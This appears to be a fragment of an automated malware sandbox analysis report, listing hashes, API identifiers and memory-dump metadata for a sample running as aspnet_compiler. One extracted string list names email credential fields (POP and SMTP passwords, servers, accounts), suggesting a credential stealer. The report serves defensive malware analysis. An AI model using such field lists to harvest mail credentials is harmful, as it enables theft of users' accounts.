                • API ID: InitVariant$AllocString$CreateInitializeInstance
                • String ID:
                • API String ID: 1312198159-0
                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                • API String ID: 0-2111798378
                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                Memory Dump Source
                • Source File: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64